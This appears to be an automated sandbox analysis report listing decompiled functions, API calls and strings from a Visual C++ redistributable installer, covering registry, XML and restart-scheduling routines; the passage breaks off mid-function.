                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00053AE4
                                                                          • EnableLUA, xrefs: 00053B0C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                                          • API String ID: 47109696-3551287084
                                                                          • Opcode ID: 8828ccfdbc5468d682a1c01ea4c241c86b15dce7bcd16f0dc6022dc7fbd91542
                                                                          • Instruction ID: 836b03f2d8ecb5b3ee72efab8bf4becc41bf842074ab2cb420fab4995f771a49
                                                                          • Opcode Fuzzy Hash: 8828ccfdbc5468d682a1c01ea4c241c86b15dce7bcd16f0dc6022dc7fbd91542
                                                                          • Instruction Fuzzy Hash: 25017C32C10238EBEB10AAA4C80BBEFFAACDB04762F204565AE01A7151E3755F54D694
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00056754 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00056754(void* __ecx, struct _FILETIME* _a4, intOrPtr _a8) {
				char _v8;
				void* _t10;
				struct _FILETIME* _t21;
				DWORD _t24;
				DWORD _t28;

				_t21 = _a4;
				_v8 = 0;
				if(_t21->dwHighDateTime != 0 ||  *_t21 != 0) {
					_t24 = 0x8007000d;
					E000137D3(_t10, "atomutil.cpp", 0x427, 0x8007000d);
				} else {
					_t24 = E000533C8(_a8,  &_v8);
					_t28 = _t24;
					if(_t28 >= 0) {
						if(_t28 != 0) {
							 *_t21 = 0;
							_t24 = 0;
							_t21->dwHighDateTime = 0;
						} else {
							_t24 = E000585CB(_v8, _t21);
						}
					}
				}
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				return _t24;
			}








                                                                          0x0005675b
                                                                          0x00056760
                                                                          0x00056766
                                                                          0x00056796
                                                                          0x000567a6
                                                                          0x0005676c
                                                                          0x00056778
                                                                          0x0005677a
                                                                          0x0005677c
                                                                          0x0005677e
                                                                          0x0005678d
                                                                          0x0005678f
                                                                          0x00056791
                                                                          0x00056780
                                                                          0x00056789
                                                                          0x00056789
                                                                          0x0005677e
                                                                          0x0005677c
                                                                          0x000567ae
                                                                          0x000567b3
                                                                          0x000567b3
                                                                          0x000567c1

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(?), ref: 000567B3
                                                                            • Part of subcall function 000585CB: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 000586D8
                                                                            • Part of subcall function 000585CB: GetLastError.KERNEL32 ref: 000586E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$ErrorFileFreeLastStringSystem
                                                                          • String ID: atomutil.cpp$clbcatq.dll
                                                                          • API String ID: 211557998-3749116663
                                                                          • Opcode ID: 67ae13b00b70195a947cfde95b7844ed1595dec58154e05fc497846c9a1ca537
                                                                          • Instruction ID: 03d65e6079532771833b0f2fcbcbd99581396bf13d7f765b8cec04ed65589221
                                                                          • Opcode Fuzzy Hash: 67ae13b00b70195a947cfde95b7844ed1595dec58154e05fc497846c9a1ca537
                                                                          • Instruction Fuzzy Hash: 7101A27190461EFBCB209F859981C9FFBB8EF08766B90427AFE0567110D3325E14D790
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00016418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 39%
                                                                          			E00016418(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _t26;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v8 = _v8 & 0;
				_v12 = _v12 & 0;
				E000509BB(_t22, GetCurrentProcess(),  &_v12);
				if(_v12 != 0) {
					if(E00015BF0(_t22, _a4,  &_v8) >= 0) {
						_t26 = E000302F4(_a8, _v8, 0);
						if(_t26 < 0) {
							_push("Failed to set variant value.");
							goto L5;
						}
					} else {
						_push("Failed to get 64-bit folder.");
						L5:
						_push(_t26);
						E0005012F();
					}
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t26;
			}






                                                                          0x00016418
                                                                          0x0001641b
                                                                          0x0001641c
                                                                          0x00016421
                                                                          0x00016423
                                                                          0x00016426
                                                                          0x00016431
                                                                          0x00016439
                                                                          0x0001644b
                                                                          0x00016461
                                                                          0x00016465
                                                                          0x00016467
                                                                          0x00000000
                                                                          0x00016467
                                                                          0x0001644d
                                                                          0x0001644d
                                                                          0x0001646c
                                                                          0x0001646c
                                                                          0x0001646d
                                                                          0x00016473
                                                                          0x0001644b
                                                                          0x00016478
                                                                          0x0001647d
                                                                          0x0001647d
                                                                          0x00016488

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0001642A
                                                                            • Part of subcall function 000509BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                            • Part of subcall function 000509BB: GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                            • Part of subcall function 000509BB: GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                            • Part of subcall function 00015BF0: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00015C77
                                                                          Strings
                                                                          • Failed to get 64-bit folder., xrefs: 0001644D
                                                                          • Failed to set variant value., xrefs: 00016467
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                          • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                                          • API String ID: 3109562764-2681622189
                                                                          • Opcode ID: 5eb448e8f3e7e9c001837de7dea57a9a62f77b917c7a136ef8283e01ad181746
                                                                          • Instruction ID: dc0c290479d5f1dceb3e716a7d80337e9fde16ab90ba078e1c46d64fc0a6efc1
                                                                          • Opcode Fuzzy Hash: 5eb448e8f3e7e9c001837de7dea57a9a62f77b917c7a136ef8283e01ad181746
                                                                          • Instruction Fuzzy Hash: 17011232D05628BBDF21A794DC06AEF7A78EB04722F108156FD4066152D7729E84D7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004D3D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E0004D3D3(void* __ebx, void* __edi, void* __eflags) {
				signed int _t37;
				void* _t38;

				E0003E830(__ebx, __edi, 0x77fc8, 0xc);
				_t37 = 0;
				 *(_t38 - 0x1c) = 0;
				E00048C77( *((intOrPtr*)( *((intOrPtr*)(_t38 + 8)))));
				 *((intOrPtr*)(_t38 - 4)) = 0;
				if(( *( *((intOrPtr*)(0x7b158 + ( *( *( *(_t38 + 0xc))) >> 6) * 4)) + 0x28 + ( *( *( *(_t38 + 0xc))) & 0x0000003f) * 0x30) & 0x00000001) == 0) {
					L3:
					 *((intOrPtr*)(E00043E36())) = 9;
					_t37 = _t37 | 0xffffffff;
				} else {
					if(FlushFileBuffers(E00048D4E(_t36)) == 0) {
						_t37 = E00043E23();
						 *_t37 = GetLastError();
						goto L3;
					}
				}
				 *(_t38 - 0x1c) = _t37;
				 *((intOrPtr*)(_t38 - 4)) = 0xfffffffe;
				E0004D45F();
				return E0003E876();
			}





                                                                          0x0004d3da
                                                                          0x0004d3df
                                                                          0x0004d3e1
                                                                          0x0004d3e9
                                                                          0x0004d3ef
                                                                          0x0004d412
                                                                          0x0004d435
                                                                          0x0004d43a
                                                                          0x0004d440
                                                                          0x0004d414
                                                                          0x0004d424
                                                                          0x0004d42b
                                                                          0x0004d433
                                                                          0x00000000
                                                                          0x0004d433
                                                                          0x0004d424
                                                                          0x0004d443
                                                                          0x0004d446
                                                                          0x0004d44d
                                                                          0x0004d459

                                                                          APIs
                                                                            • Part of subcall function 00048C77: EnterCriticalSection.KERNEL32(?), ref: 00048C92
                                                                          • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0004D41C
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0004D42D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                          • String ID: @Met
                                                                          • API String ID: 4109680722-2381362037
                                                                          • Opcode ID: e2162de5a4137322de8051ef85d4c7af35d4f7e771f5edfd8d1292f9dd02a4f9
                                                                          • Instruction ID: e40ecb537c3daafd56141a198ab0cdd146cf543f5f7fc1c89ad78ee1057ba056
                                                                          • Opcode Fuzzy Hash: e2162de5a4137322de8051ef85d4c7af35d4f7e771f5edfd8d1292f9dd02a4f9
                                                                          • Instruction Fuzzy Hash: F401A771E013049FD710BF78D90969E77A5AF45720F14825AF8149F2E3DB74D9418B54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00020598 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 49%
                                                                          			E00020598(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _t19;
				void* _t24;

				_t19 = __edx;
				_v8 = _v8 & 0x00000000;
				_t24 = E00050E3F( *((intOrPtr*)(_a4 + 0x4c)),  *((intOrPtr*)(_a4 + 0x50)), 0x20006,  &_v8);
				if(_t24 >= 0) {
					_t24 = E0001F09D(_t19, __eflags, _t21, _v8, 1, 0);
					__eflags = _t24;
					if(_t24 < 0) {
						_push("Failed to update resume mode.");
						goto L4;
					}
				} else {
					_push("Failed to open registration key.");
					L4:
					_push(_t24);
					E0005012F();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t24;
			}






                                                                          0x00020598
                                                                          0x0002059c
                                                                          0x000205b9
                                                                          0x000205bd
                                                                          0x000205d3
                                                                          0x000205d5
                                                                          0x000205d7
                                                                          0x000205d9
                                                                          0x00000000
                                                                          0x000205d9
                                                                          0x000205bf
                                                                          0x000205bf
                                                                          0x000205de
                                                                          0x000205de
                                                                          0x000205df
                                                                          0x000205e5
                                                                          0x000205ea
                                                                          0x000205ef
                                                                          0x000205ef
                                                                          0x000205fc

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000,?,?,0003BB7C,00000101,?), ref: 000205EF
                                                                          Strings
                                                                          • Failed to update resume mode., xrefs: 000205D9
                                                                          • Failed to open registration key., xrefs: 000205BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Failed to open registration key.$Failed to update resume mode.
                                                                          • API String ID: 47109696-3366686031
                                                                          • Opcode ID: ad7445141b0900a4b61b12d84f97231a3e1a081bc4ed5ccf1d31e7b5b2cd3bc5
                                                                          • Instruction ID: fc23f7e8d869e2d2f18cedeb12e2a35368176a4de14936d4acb5bf84900c92e8
                                                                          • Opcode Fuzzy Hash: ad7445141b0900a4b61b12d84f97231a3e1a081bc4ed5ccf1d31e7b5b2cd3bc5
                                                                          • Instruction Fuzzy Hash: 75F0FC32941739B7D7225A94DC06FDFB7A9EF00751F140055FA00B6152DB75AF1097D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053C58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,0001535E,?,00000000,0001535E,?,?,?), ref: 00053C7F
                                                                          • CoCreateInstance.OLE32(00000000,00000000,00000001,00076F3C,?), ref: 00053C97
                                                                          Strings
                                                                          • Microsoft.Update.AutoUpdate, xrefs: 00053C7A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromInstanceProg
                                                                          • String ID: Microsoft.Update.AutoUpdate
                                                                          • API String ID: 2151042543-675569418
                                                                          • Opcode ID: ec3a3156b9d3f96ba30231cae97aeea250c90a4321159337882d6a140d6300cc
                                                                          • Instruction ID: 9a897ac7c788822ccd31d3370b30ce9c7d94891c7d78b92bc933fbdef678bfbe
                                                                          • Opcode Fuzzy Hash: ec3a3156b9d3f96ba30231cae97aeea250c90a4321159337882d6a140d6300cc
                                                                          • Instruction Fuzzy Hash: 6AF03071A00608BBEB00DBA8DD05AFFBBA8EB48711F404065EA05F7150D675AE048AA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000530BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000530BF(void* __eax, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t12;
				intOrPtr* _t15;
				void* _t16;

				if(_a12 == 0) {
					L6:
					return 0x80070057;
				}
				_t15 = _a4;
				if(_t15 == 0) {
					goto L6;
				}
				__imp__#2(_a8, _t12);
				if(__eax != 0) {
					_t16 =  *((intOrPtr*)( *_t15 + 0xbc))(_t15, __eax, _a12);
					__imp__#6(__eax);
				} else {
					_t16 = 0x8007000e;
					E000137D3(__eax, "xmlutil.cpp", 0x66, 0x8007000e);
				}
				return _t16;
			}






                                                                          0x000530c7
                                                                          0x0005310f
                                                                          0x00000000
                                                                          0x0005310f
                                                                          0x000530c9
                                                                          0x000530ce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000530d4
                                                                          0x000530de
                                                                          0x00053101
                                                                          0x00053104
                                                                          0x000530e0
                                                                          0x000530e0
                                                                          0x000530ed
                                                                          0x000530ed
                                                                          0x00000000

                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(?), ref: 000530D4
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00053104
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: c4387240c969b82dbcbf4a4dfb9e86a0a9a41d3148fe07f453962f064a670359
                                                                          • Instruction ID: 6420294d7b147dd8bcaeb4c37a10ac326eef203a214be880af4546ee7be6ff7f
                                                                          • Opcode Fuzzy Hash: c4387240c969b82dbcbf4a4dfb9e86a0a9a41d3148fe07f453962f064a670359
                                                                          • Instruction Fuzzy Hash: 72F0B435601A58E7D7315E549C09FABBBA5AF40BA2F144028FD096B210C7759E509AA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005336E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E0005336E(void* __eax, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t12;
				intOrPtr* _t15;
				void* _t16;

				_t15 = _a4;
				if(_t15 == 0 || _a12 == 0) {
					return 0x80070057;
				} else {
					__imp__#2(_a8, _t12);
					if(__eax != 0) {
						_t16 =  *((intOrPtr*)( *_t15 + 0x1c))(_t15, __eax, _a12);
						__imp__#6(__eax);
					} else {
						_t16 = 0x8007000e;
						E000137D3(__eax, "xmlutil.cpp", 0x340, 0x8007000e);
					}
					return _t16;
				}
			}






                                                                          0x00053372
                                                                          0x00053377
                                                                          0x00000000
                                                                          0x0005337f
                                                                          0x00053383
                                                                          0x0005338d
                                                                          0x000533b0
                                                                          0x000533b3
                                                                          0x0005338f
                                                                          0x0005338f
                                                                          0x0005339f
                                                                          0x0005339f
                                                                          0x00000000
                                                                          0x000533bb

                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(?), ref: 00053383
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000533B3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 344208780-1270936966
                                                                          • Opcode ID: 161a1470133bb6f16e5b742349f74afa390e2f616fe22f490833e1cc6f363268
                                                                          • Instruction ID: 784e043318230e28a879ff8b3226b34ef11d2770bcf1ef284f71ba3c31702a11
                                                                          • Opcode Fuzzy Hash: 161a1470133bb6f16e5b742349f74afa390e2f616fe22f490833e1cc6f363268
                                                                          • Instruction Fuzzy Hash: ECF0E935200218E7C7210E499C08FAFBBA8EF847A2F104119FD05AB210CB78DF08DAE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00051344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00051344(void* _a4, short* _a8, char _a12) {
				signed short _t5;
				int _t9;

				_t9 = 0;
				_t5 = RegSetValueExW(_a4, _a8, 0, 4,  &_a12, 4);
				if(_t5 != 0) {
					_t12 =  <=  ? _t5 : _t5 & 0x0000ffff | 0x80070000;
					_t9 =  >=  ? 0x80004005 :  <=  ? _t5 : _t5 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "regutil.cpp", 0x372, _t9);
				}
				return _t9;
			}





                                                                          0x0005134d
                                                                          0x00051359
                                                                          0x00051361
                                                                          0x0005136e
                                                                          0x00051378
                                                                          0x00051386
                                                                          0x00051386
                                                                          0x0005138f

                                                                          APIs
                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0001F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00051359
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00051347
                                                                          • regutil.cpp, xrefs: 00051381
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$regutil.cpp
                                                                          • API String ID: 3702945584-2416625845
                                                                          • Opcode ID: a089f9aed6235b97515b2661d82a1ac2373613a4677e72ccd9813f2e6fca4aef
                                                                          • Instruction ID: cc4ef71a727336e2469339bb512177df1d50aa386f940028ab2b87fcd6fccae3
                                                                          • Opcode Fuzzy Hash: a089f9aed6235b97515b2661d82a1ac2373613a4677e72ccd9813f2e6fca4aef
                                                                          • Instruction Fuzzy Hash: 0AE06D72B452357AE7305AA64C05FD77ACCDF04AA0F014021BF08EA190D2658D0082E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050CD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00050CD1() {
				_Unknown_base(*)()* _t3;
				intOrPtr _t4;
				void* _t6;

				_t6 = E000137D6(L"AdvApi32.dll", 0x7b644);
				if(_t6 >= 0) {
					_t3 = GetProcAddress( *0x7b644, "RegDeleteKeyExW");
					_t4 =  *0x7b66c; // 0x0
					 *0x7b670 = _t3;
					_t5 =  ==  ? _t3 : _t4;
					 *0x7b674 = 1;
					 *0x7b66c =  ==  ? _t3 : _t4;
				}
				return _t6;
			}






                                                                          0x00050ce1
                                                                          0x00050ce5
                                                                          0x00050cf2
                                                                          0x00050cf8
                                                                          0x00050d00
                                                                          0x00050d05
                                                                          0x00050d08
                                                                          0x00050d12
                                                                          0x00050d12
                                                                          0x00050d1b

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00050CF2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                          • API String ID: 190572456-850864035
                                                                          • Opcode ID: ef9f74c43018a9eb3f117a2725b48fcb164204957b9cbf4cc26b0a1fe13d7118
                                                                          • Instruction ID: 5b5847ec114477feccbee4e49359d037cb08b93a7f266b7d7f12d74ef26c1d11
                                                                          • Opcode Fuzzy Hash: ef9f74c43018a9eb3f117a2725b48fcb164204957b9cbf4cc26b0a1fe13d7118
                                                                          • Instruction Fuzzy Hash: 6DE0E6B0F45A149FE7145F75BC16B453B90AB14B197408119FB0DA62B1DF7D58808B54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Executed Functions

                                                                          Function 000B44E9 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 137COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E000B44E9(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t13;
				int _t20;
				int _t22;
				void* _t23;
				int _t24;
				signed short _t31;
				signed short _t34;
				signed short _t37;
				void* _t45;
				int _t47;
				int _t48;
				signed int _t60;

				_t45 = __edx;
				_t13 =  *0x11a008; // 0xf77c1860
				_v8 = _t13 ^ _t60;
				asm("stosd");
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t47 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v28) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					_t20 = LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges)); // executed
					if(_t20 != 0) {
						_t22 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0); // executed
						if(_t22 != 0) {
							do {
								_t48 = 0; // executed
								Sleep(0x3e8); // executed
								_t23 =  *0x11aa5c(0, 0, 0, 0, 1, 0x80040002); // executed
								if(_t23 == 0) {
									_t48 =  <=  ? GetLastError() : _t30 & 0x0000ffff | 0x80070000;
								}
								_t24 = _t47;
								_t47 = _t47 + 1;
							} while (_t24 < 0xa && (_t48 == 0x800704f7 || _t48 == 0x80070015));
							if(_t48 < 0) {
								E000B37D3(_t24, "engine.cpp", 0x376, _t48);
								_push("Failed to schedule restart.");
								goto L13;
							}
						} else {
							_t31 = GetLastError();
							_t53 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							_t48 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							E000B37D3(0x80004005, "engine.cpp", 0x362, _t48);
							_push("Failed to adjust token to add shutdown privileges.");
							goto L13;
						}
					} else {
						_t34 = GetLastError();
						_t56 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
